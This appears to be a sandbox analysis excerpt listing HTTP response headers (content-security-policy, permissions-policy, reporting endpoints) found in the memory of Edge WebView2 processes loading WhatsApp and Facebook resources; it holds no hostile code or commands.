GMTx-content-type-options:nosniffx-xss-protection:0x-frame-options:DENYorigin-agent-cluster:?0access-control-expose-headers:X-FB-Debug, X-Loader-Lengthaccess-control-allow-methods:OPTIONSaccess-control-allow-credentials:trueaccess-control-allow-origin:https://www.whatsapp.comvary:Originstrict-transport-security:max-age=31536000; preload; includeSubDomains
                  Source: msedgewebview2.exe, 00000020.00000003.2878193597.00001B4400394000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2867093294.00001B4400AD4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2676119886.00001B4400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200reporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: *.whatsapp.com *.whatsapp.net *.twitter.com *.facebook.com *.facebook.net 'unsafe-inline' 'unsafe-eval';style-src 'self' data: blob: *.whatsapp.com *.whatsapp.net 'unsafe-inline' *.facebook.com;connect-src 'self' data: blob: *.whatsapp.com *.whatsapp.net wss://*.facebook.com:* *.fbcdn.net;font-src data: *.whatsapp.com *.whatsapp.net *.facebook.com static.xx.fbcdn.net https://fonts.gstatic.com;img-src 'self' data: blob: *.whatsapp.com *.whatsapp.net *.facebook.com *.fbcdn.net static.xx.fbcdn.net *.ytimg.com *.twitter.com;media-src 'self' data: blob: *.fbcdn.net;frame-src 'self' data: blob: *.twitter.com *.facebook.com *.youtube-nocookie.com *.youtube.com *.whatsapp.com;block-all-mixed-content;upgrade-insecure-requests;document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:same-origin-allow-popups;report-to="coop_report"pragma:no-cachecache-control:private, no-cache, no-store, must-revalidateexpires:Sat, 01 Jan 2000 00:00:00 GMTx-content-type-options:nosniffx-xss-protection:0x-frame-options:DENYorigin-agent-cluster:?0access-control-expose-headers:X-FB-Debug, X-Loader-Lengthaccess-control-allow-methods:OPTIONSaccess-control-allow-credentials:trueaccess-control-allow-origin:https://www.whatsapp.comvary:Originstrict-transport-security:max-age=31536000; preload; includeSubDomains
                  Source: msedgewebview2.exe, 00000020.00000003.2567101578.00001B4400AD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200vary:Accept-Encodingcontent-encoding:brcontent-type:application/javascript; charset=UTF-8reporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:same-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:same-origin-allow-popups;report-to="coop_report"pragma:no-cachecache-control:no-cacheexpires:Sat, 01 Jan 2000 00:00:00 GMTx-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob:
                  Source: msedgewebview2.exe, 00000020.00000003.2567101578.00001B4400AD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200vary:Accept-Encodingcontent-encoding:brcontent-type:application/javascript; charset=UTF-8reporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:same-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:same-origin-allow-popups;report-to="coop_report"pragma:no-cachecache-control:no-cacheexpires:Sat, 01 Jan 2000 00:00:00 GMTx-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob:
                  Source: msedgewebview2.exe, 0000001D.00000003.2569444937.00002DDC00DD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200vary:Accept-Encodingcontent-encoding:brcontent-type:application/javascript; charset=UTF-8reporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:same-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:same-origin-allow-popups;report-to="coop_report"pragma:no-cachecache-control:no-cacheexpires:Sat, 01 Jan 2000 00:00:00 GMTx-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob:
                  Source: msedgewebview2.exe, 0000001D.00000003.2569444937.00002DDC00DD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200vary:Accept-Encodingcontent-encoding:brcontent-type:application/javascript; charset=UTF-8reporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:same-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:same-origin-allow-popups;report-to="coop_report"pragma:no-cachecache-control:no-cacheexpires:Sat, 01 Jan 2000 00:00:00 GMTx-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob:
                  Source: msedgewebview2.exe, 00000020.00000003.2550466439.00001B44006B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200vary:Accept-Encodingcontent-encoding:brcontent-type:application/json; charset=utf-8x-robots-tag:noindexreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:same-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:same-origin-allow-popups;report-to="coop_report"pragma:no-cachecache-control:private, no-cache, no-store, must-revalidateexpires:Sat, 01 Jan 2000 00:00:00 GMTx-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com
                  Source: msedgewebview2.exe, 00000020.00000003.2550466439.00001B44006B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200vary:Accept-Encodingcontent-encoding:brcontent-type:application/json; charset=utf-8x-robots-tag:noindexreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:same-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:same-origin-allow-popups;report-to="coop_report"pragma:no-cachecache-control:private, no-cache, no-store, must-revalidateexpires:Sat, 01 Jan 2000 00:00:00 GMTx-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com
                  Source: msedgewebview2.exe, 00000020.00000002.3651704953.00001B4400216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200vary:Accept-Encodingcontent-encoding:gzipcontent-type:application/x-javascript; charset=utf-8access-control-allow-origin:*last-modified:Mon, 01 Jan 2001 08:00:00 GMTexpires:Mon, 24 Feb 2025 14:36:36 GMTcache-control:public,max-age=31536000,immutablereport-to:{"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy-report-only:clipboard-read=(), clipboard-write=();report-to="permissions_policy"permissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), clipboard-write=(self), display-capture=(self), encrypted-media=(self), fullscreen=(self), gamepad=*, geolocation=(self), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(self), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=(self);report-to="permissions_policy"x-content-type-options:nosniffreporting-endpoints:permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"x-fb-optimizer:1content-md5:1MfUCqTq+JZml9s92yVcDw==x-fb-debug:j0kTCFqxb22psySQuADtv4Xju9oNfpog8Vp7vgCVF9geJozJWagnmR7UQB0N3KBrKD/w+hun2M2Dyd3c6i/rVA==cross-origin-resource-policy:cross-origintiming-allow-origin:*accept-ranges:bytescontent-length:16720date:Sun, 10 Mar 2024 16:46:30 GMTx-fb-connection-quality:MODERATE; q=0.3, rtt=209, rtx=0, c=2011, mss=1232, tbw=5295427, tp=4406, tpl=0, uplat=1, ullat=-1alt-svc:h3=":44 equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2596607980.00001B4400AD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200vary:Accept-Encodingcontent-encoding:gzipcontent-type:application/x-javascript; charset=utf-8access-control-allow-origin:*last-modified:Mon, 01 Jan 2001 08:00:00 GMTexpires:Mon, 24 Feb 2025 14:36:36 GMTcache-control:public,max-age=31536000,immutablereport-to:{"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy-report-only:clipboard-read=(), clipboard-write=();report-to="permissions_policy"permissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), clipboard-write=(self), display-capture=(self), encrypted-media=(self), fullscreen=(self), gamepad=*, geolocation=(self), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(self), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=(self);report-to="permissions_policy"x-content-type-options:nosniffreporting-endpoints:permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"x-fb-optimizer:1content-md5:1MfUCqTq+JZml9s92yVcDw==x-fb-debug:j0kTCFqxb22psySQuADtv4Xju9oNfpog8Vp7vgCVF9geJozJWagnmR7UQB0N3KBrKD/w+hun2M2Dyd3c6i/rVA==cross-origin-resource-policy:cross-origintiming-allow-origin:*accept-ranges:bytescontent-length:16720date:Sun, 10 Mar 2024 16:46:30 GMTx-fb-connection-quality:MODERATE; q=0.3, rtt=209, rtx=0, c=2011, mss=1232, tbw=5295427, tp=4406, tpl=0, uplat=1, ullat=-1alt-svc:h3=":443"; ma=86400priority:u=1 equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3644902662.00001B44000D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200vary:Accept-Encodingcontent-encoding:gzipcontent-type:application/x-javascript; charset=utf-8access-control-allow-origin:*last-modified:Mon, 01 Jan 2001 08:00:00 GMTexpires:Mon, 24 Feb 2025 14:36:36 GMTcache-control:public,max-age=31536000,immutablereport-to:{"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy-report-only:clipboard-read=(), clipboard-write=();report-to="permissions_policy"permissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), clipboard-write=(self), display-capture=(self), encrypted-media=(self), fullscreen=(self), gamepad=*, geolocation=(self), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(self), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=(self);report-to="permissions_policy"x-content-type-options:nosniffreporting-endpoints:permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"x-fb-optimizer:1content-md5:1MfUCqTq+JZml9s92yVcDw==x-fb-debug:j0kTCFqxb22psySQuADtv4Xju9oNfpog8Vp7vgCVF9geJozJWagnmR7UQB0N3KBrKD/w+hun2M2Dyd3c6i/rVA==cross-origin-resource-policy:cross-origintiming-allow-origin:*accept-ranges:bytescontent-length:16720date:Sun, 10 Mar 2024 16:46:30 GMTx-fb-connection-quality:MODERATE; q=0.3, rtt=209, rtx=0, c=2011, mss=1232, tbw=5295427, tp=4406, tpl=0, uplat=1, ullat=-1alt-svc:h3=":443"; ma=86400priority:u=11 equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2621450426.00001B4400448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200vary:Accept-Encodingcontent-encoding:gzipcontent-type:application/x-javascript; charset=utf-8access-control-allow-origin:*last-modified:Mon, 01 Jan 2001 08:00:00 GMTexpires:Sat, 08 Mar 2025 05:38:51 GMTcache-control:public,max-age=31536000,immutablereport-to:{"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), clipboard-read=(self), clipboard-write=(self), display-capture=(self), encrypted-media=(self), fullscreen=(self), gamepad=*, geolocation=(self), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(self), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=(self);report-to="permissions_policy"x-content-type-options:nosniffreporting-endpoints:permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"content-md5:ugiGv/cG748Kdp6IZnfIYA==x-fb-debug:DRng6TVBFlyNiLCluyam3jC8ewRD0/mYYiEogC7BiI48BIKZzgAIup+VzyY4j879nZT1OKSHEaATlSqGhBv0PA==cross-origin-resource-policy:cross-origintiming-allow-origin:*accept-ranges:bytescontent-length:43583date:Sun, 10 Mar 2024 16:46:30 GMTx-fb-connection-quality:MODERATE; q=0.3, rtt=209, rtx=0, c=2011, mss=1232, tbw=5250067, tp=4367, tpl=0, uplat=8, ullat=-1alt-svc:h3=":443"; ma=86400priority:u=1 equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3647474243.00001B4400130000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: QAAABodHRwczovL3doYXRzYXBwLmNvbQ==",false]ta: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: 